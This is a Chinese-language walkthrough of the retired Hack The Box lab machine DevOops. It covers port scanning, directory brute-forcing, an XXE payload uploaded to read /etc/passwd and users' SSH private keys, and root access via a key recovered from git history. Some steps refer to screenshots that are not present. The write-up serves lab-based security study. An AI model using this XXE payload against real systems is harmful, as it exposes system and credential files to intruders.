HTB-靶机-DevOops

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关

靶机是作者购买VIP使用退役靶机操作，显示IP地址为10.10.10.91

本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

执行命令 autorecon 10.10.10.91 -o ./DevOops-autorecon

看到开放了5000的web应用端口，访问看看

没发现啥东西，跑跑目录看看

gobuster dir -u http://10.10.10.91:5000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 400 -x php,jsp,txt -o bmfx-devoops-gobuster

爆破出来一个目录upload访问下

看上面显示带XML的，猜测可能存在XXE攻击，通过构造下面的XXE攻击代码

<?xml version="1.0"?>
  <!DOCTYPE foo [
   <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "file:///etc/passwd" >
  ]>
  <feed>
    <Author>Gerh</Author>
    <Subject>BinaryChaos</Subject>
    <Content>&xxe;</Content>
  </feed>

上传之后通过burpsuite进行重放请求

看到了 3个普通用户，分别是osboxes,roosa,blogfeed 都尝试读取这些用户的id_rsa，经过测试最终得到如下

使用此密钥给其400权限然后远程ssh登录

通过遍历当前目录下的各个文件，发现发现一处密钥信息

使用此密钥登录root用户，发现不能正常登录，猜测可能不是root的私钥，使用git stash保存下当前工作进度，具体如下操作：

 

到了上述实际是可以直接复制上述得到的密钥去掉前面每行的所有”+“即可，但是我这还是想把写入到文件中，自动剔除+号

最终成功使用ssh登录root用户